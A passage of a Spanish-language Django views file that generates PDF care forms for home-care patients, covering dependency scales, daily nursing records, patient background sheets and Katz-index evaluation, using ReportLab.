etc.\")\n\ty=y-15\n\tc.drawString(35,y, \"(2) Necesita ayuda frecuentemente para el aseo diario.\")\n\ty=y-15\n\tc.drawString(35,y, \"(3) Hay que ayudarlo siempre.\")\n\n\ty=y-30\n\tc.drawString(35,y, \"4.- VESTIDO:\")\n\ty=y-15\n\tc.drawString(35,y, \"(0) Autónomo\")\n\ty=y-15\n\tc.drawString(35,y, \"(1) En ocaciones hay que ayudarle\")\n\ty=y-15\n\tc.drawString(35,y, \"(2) Necesita siempre ayuda para ponerse alguna prenda o calzarse.\")\n\ty=y-15\n\tc.drawString(35,y, \"(3) Es necesario vestirlo y calzarlo totalmente.\")\n\n\ty=y-30\n\tc.drawString(35,y, \"5.- ALIMENTACIÓN:\")\n\ty=y-15\n\tc.drawString(35,y, \"(0) Lo hace solo\")\n\ty=y-15\n\tc.drawString(35,y, \"(1) Precisa ayuda ocacional para comer. A veces hay que prepararle los alimentos\")\n\ty=y-15\n\tc.drawString(35,y, \"(2) Precisa con frecuencia ayuda para comer. Se suele preparar los alimentos\")\n\ty=y-15\n\tc.drawString(35,y, \"(3) Hay que administrarle la comida\")\n\tc.showPage() # ########################################################salto de pagina\n\ty=700\n\tc.drawString(35,y, \"6.- HIGIENE BACTERIANA:\")\n\ty=y-15\n\tc.drawString(35,y, \"(0) Continencia. Incontinencia urinaria esporadica.\")\n\ty=y-15\n\tc.drawString(35,y, \"(1) Incontinencia urinaria nocturna y fecal esporadica. Colostomia\")\n\ty=y-15\n\tc.drawString(35,y, \"(2) Incontinencia urinaria permanente, diurna y nocturna. Sonda vesical\")\n\ty=y-15\n\tc.drawString(35,y, \"(2) Incontinencia urinaria y fecal total\")\n\n\ty=y-30\n\tc.drawString(35,y, \"7.- ADMINISTRACION DE TRATAMIENTOS:\")\n\ty=y-15\n\tc.drawString(35,y, \"(0) No precisa. Gestión autónoma\")\n\ty=y-15\n\tc.drawString(35,y, \"(1) Necesita supervisión en la toma de medicación y/o ayuda ocacional en la sdministracion de\")\n\ty=y-15\n\tc.drawString(35,y, \" determinados tratamientos\")\n\ty=y-15\n\tc.drawString(35,y, \"(2) Hay que prepararle y administrarle la medicación diariamente\")\n\ty=y-15\n\tc.drawString(35,y, \"(3) Precisa sueroterapia, oxigenoterapia, alimentacion por sonda nasogastrica, etc.\")\n\n\ty=y-30\n\tc.drawString(35,y, \"8.- CUIDADOS DE ENFERMERIA: (Prevención de escaras, curas de pie diabéticos, curas adicionales\")\n\ty=y-15\n\tc.drawString(35,y, \" al cuidado habitual de la FAV, mayor supervisión o sintomatología durante la dialisis portadores\")\n\ty=y-15\n\tc.drawString(35,y, \" de caracteres..)\")\n\ty=y-15\n\tc.drawString(35,y, \"(0) No precisa\")\n\ty=y-15\n\tc.drawString(35,y, \"(1) Precisa cura o actuación ocacional de enfermería\")\n\ty=y-15\n\tc.drawString(35,y, \"(2) Precisa cura o actuación de enfermería preiodicamente\")\n\ty=y-15\n\tc.drawString(35,y, \"(3) Supervicion continuada: atención de enfermos terminales, curas de lesiones graves\")\n\n\ty=y-30\n\tc.drawString(35,y, \"9.- NECESIDADES DE VIGILANCIA:\")\n\ty=y-15\n\tc.drawString(35,y, \"(0) No precisa\")\n\ty=y-15\n\tc.drawString(35,y, \"(1) Trastornos de conducta temporales que impliquen necesidad de vigilancia ocacional\")\n\ty=y-15\n\tc.drawString(35,y, \" \")\n\ty=y-15\n\tc.drawString(35,y, \"(2) Trastornos de conducta permanentes que alteren la convivencia de forma leve o\")\n\ty=y-15\n\tc.drawString(35,y, \" moderada (ideas de muerte)\")\n\ty=y-15\n\tc.drawString(35,y, \"(3) Trastornos de conducta intensos permanentes que alteren la convivencia de forma\")\n\ty=y-15\n\tc.drawString(35,y, \" grave (riesgo de suicidio)\")\n\n\ty=y-30\n\tc.drawString(35,y, \"10.- COLABORACION:\")\n\ty=y-15\n\tc.drawString(35,y, \"(0) Colaborador\")\n\ty=y-15\n\tc.drawString(35,y, \"(1) Comportamiento pasivo (necesita estímulo)\")\n\ty=y-15\n\tc.drawString(35,y, \"(2) No colabora\")\n\ty=y-15\n\tc.drawString(35,y, \"(3) Rechazo categórico y constante\")\n\n\t#c.drawString(35,y, \"parametros: h=\"+str(h)+\" w=\"+str(w)+\" y=\"+str(y)+\" alto=\"+str(alto)+\" ancho=\"+str(ancho))\n\n\t## ######## FIN DEL REPORTE ####################\n\tc.showPage() #salto de pagina\n\tc.save() #Archivamos y cerramos el canvas\n\t#Lanzamos el pdf creado\n\tos.system(nom_arch)\n\n\t#desarrollo\n\treturn FileResponse(open(os.getcwd() +'\\\\pdfs\\\\'+ nom_arch,'rb'), content_type='application/pdf')\n\n\tresponse['Content-Disposition'] = 'attachment; filename='+nom_arch\n\tvariable1 = 'Despliegue de Pacientes'\n\tpaciente = Pacientes.objects.all().order_by('nombre')\n\tfalso_x = False # paciente HABILITADO - DESHABILITADO \n\tcontext = {\t\"pacientes\":paciente,\"falso_x\":falso_x,\"variable1\":variable1,}\n\treturn render(request,'grid_pacientes.html',context)\n\n\n#class verticalText(Flowable):\n#\tdef __init__(self, text):\n#\t\tFlowable.__init__(self)\n#\t\tself.text = text\n#\n#\tdef draw(self):\n#\t\tc = self.canv\n#\t\tc.rotate(90)\n#\t\tfs = c._fontsize\n#\t\tc.translate(1, -fs/1.2) # canvas._leading?\n#\t\tc.drawString(0, 0, self.text)\n#\n#\tdef wrap(self, aW, aH):\n#\t\tc = self.canv\n#\t\t#fn, fs = c._fontname, c._fontsize\n#\t\t#return c._leading, 1 + c.stringWidth(self.text, fn, fs)\n#\t\treturn self.text\n\n\n@login_required(login_url='login_ini')\ndef regdiario(request):\n\tfechahoy = datetime.now()\n\t#ancho, alto = letter\t# alto=792,ancho=612 - posicion normal\t\n\talto, ancho = letter\t# alto=792,ancho=612 - posicion apaisada\n\tnom_arch = \"regdia\"+nombrearch()+\".pdf\"\n\t#\n\t# desarrollo\n\tlogo_corp = os.getcwd()+\"\\\\misitio\\\\ai\\\\static\\\\img\\\\Logo_AsistenciaIntegral.jpg\"\n\tc = canvas.Canvas(os.getcwd() +\"\\\\pdfs\\\\\"+ nom_arch, pagesize=letter)\n\t#\n\t#produccion\n\t#logo_corp = os.getcwd()+\"/misitio/staticfiles/img/Logo_AsistenciaIntegral.jpg\"\n\t#c = canvas.Canvas(os.getcwd() +\"/misitio/pdfs/\"+ nom_arch, pagesize=letter)\n\t#\n\tc.setPageSize((ancho, alto))\n\t#\n\trut_aux = request.session['rut_x']\t\t\n\tpaciente = Pacientes.objects.get(rut=rut_aux) \n\tif paciente.fe_ini == None:\n\t\treturn HttpResponse(\"Paciente no posee fecha de inicio\")\n\n\tfe_nac = paciente.fe_nac\n\tedad_x = edad(paciente.fe_nac) # en misfunciones.py\n\tsexo_x = \"Masculino\"\n\tif paciente.sexo == 2:\n\t\tsexo_x = \"Femenino\" \n\n\tdomicilio_x = paciente.direccion\t\n\tfono_pcte = paciente.fono_pcte\n\tfe_nac = paciente.fe_nac\n\t#\n\t# produccion\n\t#path_x = os.getcwd() +\"/misitio/pdfs/\"\n\t#\n\t# Desarrollo\n\tpath_x = os.getcwd() +'\\\\pdfs\\\\'\n\n\tarch_y = os.listdir(path_x)\n\tfor arch_pdf in arch_y:\n\t\tremove(path_x+arch_pdf)\n\t#\n\t# ######### COMIENZA EL REPORTE ######################################\t\t\n\ty = 530\n\tc.drawImage(logo_corp, 10, y,190,80) # (IMAGEN, X,Y, ANCHO, ALTO)\n\t#y = y - 20\t # alto de logo \n\tc.setFont('Helvetica-Bold', 11)\n\tc.drawString(350,y, \"REGISTRO DIARIO\")\n\ty= y-3\n\tc.drawString(350,y, \"________________\")\n\ty = y -15\n\tc.setFont('Helvetica', 10)\n\n\tc.drawString(30,y,\"Paciente: \"+str(paciente)+\", RUT: \"+rut_aux+\" edad: \"+str(edad_x)+\" sexo: \"+sexo_x)\n\ty = y - 15\n\tc.drawString(30,y,\"Domicilio: \"+domicilio_x+\" Teléfono: \"+fono_pcte+\" Prevision de Salud Comun:\")\n\ty = y - 15\n\tc.drawString(30,y,\"Fecha de Nacimiento: \"+fecha_ddmmaaaa(fe_nac)+\" Fecha de inicios de Cuidados: _____/_____/______\")\n\t\n\ty = y - 35\n\tc.setFont('Helvetica-Bold', 10)\n\tc.drawString(30,y, \"Signos Vitales\")\n\tc.drawString(210,y, \"Nombre TENS o cuidadoras: _______________________ ______________________ _________________\")\n\tc.setFont('Helvetica', 10)\n\n\tdata = [\n\t\t[\"Plan de enfermería\",\"S/N\",\"Horario \",\"Fecha\",\"Fecha\",\"Fecha\",\"Fecha\",\"Fecha\",\"Fecha\",\"Fecha\"],\n\t\t[\"Temperatura\",\"\",\"\",\"\"],\n\t\t[\"Frecuencia cardiaca\",\"\",\"\"],\n\t\t[\"Presión arterial\",\"\",\"\"],\n\t\t[\"Frecuencia respiratoria\",\"\",\"\"],\n\t\t[\"Saturacion O2\",\"\",\"\"],\n\t\t[\"LT O2\",\"\",\"\"],\n\t\t[\"EVA\",\"\",\"\"],]\n\n\tt = Table(data, colWidths=[120,35,60,72])\t\n\n\tt.setStyle(TableStyle([\n\t\t(\"ALIGN\", (0, 0), (-1, -1), \"LEFT\"),\n\t\t(\"ALIGN\", (-2, 1), (-2, -1), \"LEFT\"),\n\t\t(\"GRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"BOX\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"INNERGRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t]))\n\n\tw, h = t.wrap(100, 100) \n\tt.drawOn(c, 30, 295, 0) # alto=792, h=90\n\t# ################ fin primera grid de PRIMERA HOJA ###############################################\n\ty = 275\n\tc.setFont('Helvetica-Bold', 10)\n\tc.drawString(30,y, \"Prepartamos\")\n\tc.setFont('Helvetica', 10)\n\n\tdata = [\n\t\t[\"Aspiración Sensoriales\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],\n\t\t[\"Condición tratestomía\",\"\",\"\",\"\"],\n\t\t[\"Cambio Endocanula,\",\"\",\"\"],\n\t\t[\"Cambio set nebulización\",\"\",\"\"],\n\t\t[\"Cambio set Oxigenoterapia\",\"\",\"\"],\n\t]\n\n\tt = Table(data, colWidths=[120,35,60,72])\t\n\n\tt.setStyle(TableStyle([\n\t\t(\"ALIGN\", (0, 0), (-1, -1), \"LEFT\"),\n\t\t(\"ALIGN\", (-2, 1), (-2, -1), \"LEFT\"),\n\t\t(\"GRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"BOX\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"INNERGRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t]))\n\n\tw, h = t.wrap(100, 100) \n\t#return HttpResponse(\"w=\"+str(w)+\" h=\"+str(h))\n\tt.drawOn(c, 30, 180, 0) \n\t# ############### fin segunda grid DE PRIMERA HOJA ###############\t\n\ty = 160\n\tc.setFont('Helvetica-Bold', 10)\n\tc.drawString(30,y, \"Receta\")\n\tc.setFont('Helvetica', 10)\n\n\tdata = [\n\t\t[\"Alimentacion\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],\n\t\t[\"Hidratación\",\"\",\"\",\"\"],\n\t\t[\"Curacion Gastrotomía,\",\"\",\"\"],\n\t\t[\"Cambio circuito Infución\",\"\",\"\"],\n\t]\n\n\tt = Table(data, colWidths=[120,35,60,72])\t\n\n\tt.setStyle(TableStyle([\n\t\t(\"ALIGN\", (0, 0), (-1, -1), \"LEFT\"),\n\t\t(\"ALIGN\", (-2, 1), (-2, -1), \"LEFT\"),\n\t\t(\"GRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"BOX\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"INNERGRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t]))\n\n\tw, h = t.wrap(100, 100) \n\tt.drawOn(c, 30, 80, 0) \n\t# ############### fin tercera GRID ###############\t\n\t# ############### fin primera hoja ###############\t\n\tc.showPage() #salto de pagina\n\ty = 530\n\tc.drawImage(logo_corp, 10, y,190,80) # (IMAGEN, X,Y, ANCHO, ALTO)\n\t#\n\tdata = [\n\t\t[\"Plan de enfermería\",\"S/N\",\"Horario \",\"Fecha\",\"Fecha\",\"Fecha\",\"Fecha\",\"Fecha\",\"Fecha\",\"Fecha\"],\n\t\t[\"Baño\",\"\",\"\",\"\"],\n\t\t[\"Lavado de cabello\",\"\",\"\"],\n\t\t[\"Aseo de cavidades\",\"\",\"\"],\n\t\t[\"Rasurado\",\"\",\"\"],\n\t\t[\"Aseo genital\",\"\",\"\"],\n\t\t[\"Cambio de pañal\",\"\",\"\"],\n\t\t[\"Preservativo\",\"\",\"\"],\n\t\t[\"Cambio ropa de cama\",\"\",\"\"],\n\t\t[\"Revis. puntos de apoyo\",\"\",\"\"],\n\t\t[\"Lubricación de piel\",\"\",\"\"],\n\t\t[\"Cambio posición\",\"\",\"\"],]\n\n\tt = Table(data, colWidths=[120,35,60,72])\t\n\tt.setStyle(TableStyle([\n\t\t(\"ALIGN\", (0, 0), (-1, -1), \"LEFT\"),\n\t\t(\"ALIGN\", (-2, 1), (-2, -1), \"LEFT\"),\n\t\t(\"GRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"BOX\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"INNERGRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t]))\n\n\ty = y - 10\n\tc.setFont('Helvetica-Bold',10)\n\tc.drawString(30,y, \"Aseo y Confort\")\n\tc.setFont('Helvetica', 10)\n\n\tw, h = t.wrap(100, 100) \n\tt.drawOn(c, 30, 298, 0) # alto=792, h=90\n\t## FIN PRIMERA GRID DE SEGUNDA HOJA ########################################\n\t#\n\tdata = [\n\t\t[\"Estimulación anál\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],\n\t\t[\"Curación yeyunostomía\",\"\",\"\",\"\"],\n\t\t[\"Curación ileostomia\",\"\",\"\"],\n\t\t[\"Curacion colostomía\",\"\",\"\"],\n\t\t[\"Diuresis total\",\"\",\"\"],\n\t\t[\"Cambio bolsa recolectora\",\"\",\"\"],\n\t\t[\"Vaciamiento bolsa ostomía\",\"\",\"\"],]\n\n\tt = Table(data, colWidths=[120,35,60,72])\t\n\n\tt.setStyle(TableStyle([\n\t\t(\"ALIGN\", (0, 0), (-1, -1), \"LEFT\"),\n\t\t(\"ALIGN\", (-2, 1), (-2, -1), \"LEFT\"),\n\t\t(\"GRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"BOX\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"INNERGRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t]))\n\n\t# --grid y titulo respectivo ---\n\ty = 280\n\tc.setFont('Helvetica-Bold',10)\n\tc.drawString(30,y, \"Eliminación\")\n\tc.setFont('Helvetica', 10)\n\n\tw, h = t.wrap(100, 100) \n\tt.drawOn(c, 30, 150, 0) \n\n\t## FIN SEGUNDA GRID DE SEGUNDA HOJA ########################################\n\tdata = [\n\t\t[\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],\n\t\t[\"\",\"\",\"\",\"\"],\n\t\t[\"\",\"\",\"\"],\n\t\t[\"\",\"\",\"\"],]\n\n\tt = Table(data, colWidths=[120,35,60,72])\t\n\n\tt.setStyle(TableStyle([\n\t\t(\"ALIGN\", (0, 0), (-1, -1), \"LEFT\"),\n\t\t(\"ALIGN\", (-2, 1), (-2, -1), \"LEFT\"),\n\t\t(\"GRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"BOX\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"INNERGRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t]))\n\n\t# -- deploy de grid y titulo respectivo ---\n\ty = 130\n\tc.setFont('Helvetica-Bold',10)\n\tc.drawString(35,y, \"Otros\")\n\tc.setFont('Helvetica', 10)\n\n\tw, h = t.wrap(100, 100) \n\tt.drawOn(c, 30, 50, 0) \n\t## FIN TERCERA GRID DE SEGUNDA HOJA ########################################\n\tc.setFont('Helvetica-Bold', 10)\n\tc.drawString(145,26,\"Atención y Cuidado de enfermos, Procedimientos de enfermería, Kinesiología y Nutrición\")\n\t#\n\t## ######## FIN DEL REPORTE ####################\n\tc.showPage() #salto de pagina\n\tc.save() #Archivamos y cerramos el canvas\n\t#Lanzamos el pdf creado\n\tos.system(nom_arch)\n\n\t#desarrollo\n\treturn FileResponse(open(os.getcwd() +'\\\\pdfs\\\\'+ nom_arch,'rb'), content_type='application/pdf')\n\n\n@login_required(login_url='login_ini')\ndef antecedente2(request):\n\tfechahoy = datetime.now()\n\talto, ancho = letter\t# alto=792,ancho=612\n\tnom_arch = \"regdia\"+nombrearch()+\".pdf\"\n\t# desarrollo\n\tlogo_corp = os.getcwd()+\"\\\\misitio\\\\ai\\\\static\\\\img\\\\Logo_AsistenciaIntegral.jpg\"\n\tc = canvas.Canvas(os.getcwd() +\"\\\\pdfs\\\\\"+ nom_arch, pagesize=letter)\n\t#\n\t#produccion\n\t#logo_corp = os.getcwd()+\"/misitio/staticfiles/img/Logo_AsistenciaIntegral.jpg\"\n\t#c = canvas.Canvas(os.getcwd() +\"/misitio/pdfs/\"+ nom_arch, pagesize=letter)\n\t#\n\tc.setPageSize((ancho, alto))\n\t#\n\trut_aux = request.session['rut_x'] # variable publica\t\t\n\tpaciente = Pacientes.objects.get(rut=rut_aux) \n\tcomuna = Param.objects.get(tipo='COMU',codigo=paciente.comuna)\n\n\tecivil = \"No especifica\"\n\tif paciente.ecivil != None:\n\t\tecivil = Param.objects.get(tipo='ECIVI',codigo=paciente.ecivil)\n\n\tif paciente.fe_ini == None:\n\t\treturn HttpResponse(\"Paciente no posee fecha de inicio\")\n\n\tedad_x = edad(paciente.fe_nac) # en misfunciones.py\n\n\tsexo_x = \"Masculino\"\n\tif paciente.sexo == 2:\n\t\tsexo_x = \"Femenino\" \n\n\tdomicilio_x = paciente.direccion\t\n\tfono_pcte = paciente.fono_pcte\n\tfono2_pcte = paciente.fono2_pcte\n\tif paciente.fono2_pcte == None:\n\t\tfono2_pcte = \"\"\n\t#\n\t# produccion\n\t#path_x = os.getcwd() +\"/misitio/pdfs/\"\n\t#\n\t# Desarrollo\n\tpath_x = os.getcwd() +'\\\\pdfs\\\\'\n\n\tarch_y = os.listdir(path_x)\n\tfor arch_pdf in arch_y:\n\t\tremove(path_x+arch_pdf)\n\t# ######### COMIENZA EL REPORTE ##########################################\t\t\n\ty = 530\n\tc.drawImage(logo_corp, 10, y,190,80) # (IMAGEN, X,Y, ANCHO, ALTO)\n\tdata = [\n\t\t[\"Nombre\",paciente.nombre],\n\t\t[\"R.U.T.\",paciente.rut],\n\t\t[\"Edad\",edad_x],\n\t\t[\"Dirección\",paciente.direccion],\n\t\t[\"Comuna\",comuna.descrip],\n\t\t[\"Telefono fijo / celular\",fono_pcte],\n\t\t[\"Estado civil\",ecivil],]\n\n\tt = Table(data, colWidths=[130,360])\t\n\n\tt.setStyle(TableStyle([\n\t\t(\"ALIGN\", (0, 0), (-1, -1), \"LEFT\"),\n\t\t(\"ALIGN\", (-2, 1), (-2, -1), \"LEFT\"),\n\t\t(\"GRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"BOX\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"INNERGRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t]))\n\n\ty = 516\n\tc.setFont('Helvetica-Bold', 10)\n\tc.drawString(30,y, \"ANTECEDENTES DEL PACIENTE\")\n\tc.setFont('Helvetica', 10)\n\n\tw, h = t.wrap(100, 100) \n\tt.drawOn(c, 30, 380, 0) \n\t# ################ FIN PRIMERA GRID ###############################################\n\ty = 530\n\tc.drawImage(logo_corp, 10, y,190,80) # (IMAGEN, X,Y, ANCHO, ALTO)\n\tdata = [\n\t\t[\"Diagnosticos\",\"Laborales\",\"No laborales\"],\n\t\t[\"Prestador sala común\",],\n\t\t[\"Jornada Cuidadoras\",\"\"],\n\t\t[\"Controles médicos\",\"\"],\n\t\t[\"Rehabilitación\",\"\"],\n\t\t[\"Mantención\",\"\"],\n\t\t[\"Cargas\",\"\"],\n\t\t[\"Próxio control de salud\",\"\"],\t\t\n\t\t]\n\n\tt = Table(data, colWidths=[130,260,260])\t\n\n\tt.setStyle(TableStyle([\n\t\t(\"ALIGN\", (0, 0), (-1, -1), \"LEFT\"),\n\t\t(\"ALIGN\", (-2, 1), (-2, -1), \"LEFT\"),\n\t\t(\"GRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"BOX\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"INNERGRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t]))\n\n\ty = 360\n\tc.setFont('Helvetica-Bold', 10)\n\tc.drawString(30,y, \"ANTECEDENTES DE SALUD\")\n\tc.setFont('Helvetica', 10)\n\n\tw, h = t.wrap(100, 100) \n\tt.drawOn(c, 30, 210, 0)\t# dibuja la grid en memoria \n\t# ################ FIN SEGUNDA GRID ###############################################\n\n\t# rectangulo\n\tesquina = 230\n\tc.rect(460, esquina, 30, 30)\n\n\t## ######## FIN DEL REPORTE ############################################\n\tc.showPage() #salto de pagina\n\tc.save() #Archivamos y cerramos el canvas\n\t#Lanzamos el pdf creado\n\tos.system(nom_arch)\n\t#desarrollo\n\treturn FileResponse(open(os.getcwd() +'\\\\pdfs\\\\'+ nom_arch,'rb'), content_type='application/pdf')\n\n\ndef antecedente(request):\n\tvariable1 = 'Ficha de Apoderado'\n\tvariable2 = 'modifica_rut'\n\n\t# ------------ DATOS DEL PACIENTE -----\n\trut_aux = request.session['rut_x'] # variable publica\n\tpaciente = Pacientes.objects.get(rut=rut_aux)\n\tcomuna = Param.objects.get(tipo='COMU',codigo=paciente.comuna)\n\n\tecivil = \"No especifica\"\n\tif paciente.ecivil != None:\n\t\tecivil = Param.objects.get(tipo='ECIVI',codigo=paciente.ecivil)\n\n\tif paciente.fe_ini == None:\n\t\treturn HttpResponse(\"Paciente no posee fecha de inicio\")\n\n\tedad_x = edad(paciente.fe_nac) # en misfunciones.py\n\n\tsexo_x = \"Masculino\"\n\tif paciente.sexo == 2:\n\t\tsexo_x = \"Femenino\"\n\n\tdomicilio_x = paciente.direccion\n\tfono_pcte = paciente.fono_pcte\n\tfono2_pcte = paciente.fono2_pcte\n\tif paciente.fono2_pcte == None:\n\t\tfono2_pcte = \"\"\n\t#------------FIN DATOS DEL PACIENTE ------\n\n\tcontext = {\n\t\t'paciente':paciente,\n\t\t'rut':rut_aux,\n\t\t'edad':edad_x,\n\t\t'direccion':domicilio_x,\n\t\t'comuna':comuna,\n\t\t'fono':paciente.fono_pcte,\n\t\t'ecivil':ecivil,\n\t}\n\treturn render(request,'anexo1a.html',context)\n\n\t\ndef antecedente_provi(request):\n\t# desarrollo\n\tlogo_corp = \"/static/img/Logo_AsistenciaIntegral.jpg\"\n\t#produccion\n\t#logo_corp = \"/staticfiles/img/Logo_AsistenciaIntegral.jpg\" \n\t#\n\ttemplate = get_template('anexo1a.html')\n\n\tvariable1 = 'Ficha de Apoderado'\n\tvariable2 = 'modifica_rut'\n\n\t# ------------ DATOS DEL PACIENTE -----\n\trut_aux = request.session['rut_x'] # variable publica\t\t\n\tpaciente = Pacientes.objects.get(rut=rut_aux) \n\tcomuna = Param.objects.get(tipo='COMU',codigo=paciente.comuna)\n\n\tecivil = \"No especifica\"\n\tif paciente.ecivil != None:\n\t\tecivil = Param.objects.get(tipo='ECIVI',codigo=paciente.ecivil)\n\n\tif paciente.fe_ini == None:\n\t\treturn HttpResponse(\"Paciente no posee fecha de inicio\")\n\n\tedad_x = edad(paciente.fe_nac) # en misfunciones.py\n\n\tsexo_x = \"Masculino\"\n\tif paciente.sexo == 2:\n\t\tsexo_x = \"Femenino\" \n\n\tdomicilio_x = paciente.direccion\t\n\tfono_pcte = paciente.fono_pcte\n\tfono2_pcte = paciente.fono2_pcte\n\tif paciente.fono2_pcte == None:\n\t\tfono2_pcte = \"\"\n\t#------------FIN DATOS DEL PACIENTE ------\n\tcontext = {'logo_corp':logo_corp,\n\t\t'paciente':paciente,\n\t\t'rut':rut_aux,\n\t\t'edad':edad_x,\n\t\t'direccion':domicilio_x,\n\t\t'comuna':comuna,\n\t\t'fono':paciente.fono_pcte,\n\t\t'ecivil':ecivil,\n\t}\n\n\thtml = template.render(context)\n\tpdf = render_to_pdf('anexo1a.html')\n\t#return HttpResponse(pdf, content_type='application/pdf')\n\treturn render(request,'anexo1a.html',context)\n\n\n@login_required(login_url='login_ini')\ndef gestionremota(request):\n\tfechahoy = datetime.now()\n\tancho, alto = letter\t# alto=792,ancho=612 - posicion normal\t\n\tnom_arch = \"gestionre\"+nombrearch()+\".pdf\" # gestion remota\n\t#\n\t# desarrollo\n\tlogo_corp = os.getcwd()+\"\\\\misitio\\\\ai\\\\static\\\\img\\\\Logo_AsistenciaIntegral.jpg\"\n\tc = canvas.Canvas(os.getcwd() +\"\\\\pdfs\\\\\"+ nom_arch, pagesize=letter)\n\t#\n\t#produccion\n\t#logo_corp = os.getcwd()+\"/misitio/staticfiles/img/Logo_AsistenciaIntegral.jpg\"\n\t#c = canvas.Canvas(os.getcwd() +\"/misitio/pdfs/\"+ nom_arch, pagesize=letter)\n\t#\n\tc.setPageSize((ancho, alto))\n\t#\n\trut_aux = request.session['rut_x']\t\t\n\tpaciente = Pacientes.objects.get(rut=rut_aux) \n\n\tif paciente.fe_ini == None:\n\t\treturn HttpResponse(\"Paciente no posee fecha de inicio\")\n\n\t# produccion\n\t#path_x = os.getcwd() +\"/misitio/pdfs/\"\n\n\t# Desarrollo\n\tpath_x = os.getcwd() +'\\\\pdfs\\\\'\n\n\tarch_y = os.listdir(path_x)\n\tfor arch_pdf in arch_y:\n\t\tremove(path_x+arch_pdf)\n\t#\t\n ## #####################################comienza primera pagina #########\n\ty = 710\n\tc.drawImage(logo_corp, 10, y,190,80) # (IMAGEN, X,Y, ANCHO, ALTO)\n\ty = 700\n\tc.setFont('Helvetica-Bold', 11)\n\tc.drawString(190,y, \"GESTION REMOTA DE PACIENTES CIMAS + D\")\n\tc.setFont('Helvetica', 11)\n\t#\n\t# subrrayado de \"GESTION REMOTA DE PACIENTES\"\n\ty=y-20\n\tc.line(190, y+16, 436, y+16) # x,y,z,w en donde x=posic. horiz. inicial,y=poc.inicial verical,w=poc.vert.final\n\t#\n\ty = y - 20\n\tc.drawString(50,y,\"NOMBRE: \"+str(paciente.nombre)+\" R.U.T.:\"+rut_aux)\n\ty = y - 20\t\n\tc.drawString(50,y,\"FECHA: \"+\"_______/_________/__________\")\n\ty = y - 30\t\n\n\tc.setFont('Helvetica-Bold', 11)\n\tc.drawString(50,y,\"EVALUACION FUNCIONAL:\")\n\tc.setFont('Helvetica', 10)\n\ty=y-15\n\tc.drawString(50,y, \"Indice de Katz: Este indice se basa en la avaluación de independencia o dependencia funcional del paciente para:\")\n\ty=y-15\t\n\tc.drawString(50,y,\"bañarse, vestirse, ir al baño, transferirse, continencia y alimentación.\")\n\ty=y-15\t\n\tc.drawString(50,y,\"Independiente: Habilidad para funcionar sin supervisión, dirección o asistencia personal activa, excepto si es\")\n\ty=y-15\t\n\tc.drawString(50,y,\"especificamente aclarado en las definiciones.\")\n\ty=y-15\t\n\tc.drawString(50,y,\"Se basa en el estado actual, no en la habilidad que tenga.\")\n\ty=y-15\t\n\tc.drawString(50,y,\"A los pacientes que se nieguen a realizar una función, se les considerará incapaces de realizarla aunque\")\n\ty=y-15\t\n\tc.drawString(50,y,\"parezcan capaces.\")\n\n\n\t# COMIENZA DEFINICION DE GRID\n\tdata = [\n\t\t[\"\",\"A\",\"Independiente para alimentarse, transferirse,continencia, ir al baño, vestirse, bañarse\"],\n\t\t[\"\",\"B\",\"Independiente para todas, excepto para una de estas funciones.\"],\n\t\t[\"\",\"C\",\"Independiente para todo, excepto bañarse, y una funcion más\"],\n\t\t[\"\",\"D\",\"Independiente para todo, excepto bañarse, vestirse, y una funcion adicional\"],\n\t\t[\"\",\"E\",\"Independiente para todo, excepto bañarse, vestirse, ir al baño, y una función más\"],\n\t\t[\"\",\"F\",\"Independiente para todo, excepto bañarse, vestirse, ir al baño, transferirse y una función más\"],\t\t\n\t\t[\"\",\"G\",\"Dependiente en las seis funciones (todas)\"],\n\t]\n\n\t# DEFINICION DE CADA COLUMNA\n\tt = Table(data, colWidths=[30,20,450])\t\n\n\tt.setStyle(TableStyle([\n\t\t(\"ALIGN\", (0, 0), (-1, -1), \"LEFT\"),\n\t\t(\"ALIGN\", (-2, 1), (-2, -1), \"LEFT\"),\n\t\t(\"GRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"BOX\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"INNERGRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t]))\n\tw, h = t.wrap(100, 100) # OBLIGAORIO\n\tt.drawOn(c, 50, 370, 0) # DIBUJA LA GRID EN MEMORIA\n\t# FIN DE DEFINICION DE GRID\n\ty = 349\n\t# rectangulo\n\tc.rect(50, y, 500, 20)\n\t#\t\n\tc.drawString(50,y+8, \" Indice de Katz PUNTUACION FINAL:\")\n\ty=y-15\n\tc.drawString(50,y,\"Indice de Katz de independencia de las actividades de la vida diaria.\")\n\ty=y-15\n\tc.setFont('Helvetica-Bold', 10)\n\tc.drawString(50,y,\"Bañarse:\")\n\tc.setFont('Helvetica', 10)\n\tc.drawString(95,y,\"(en tina o ducha)\")\n\t#\n\t#segundo 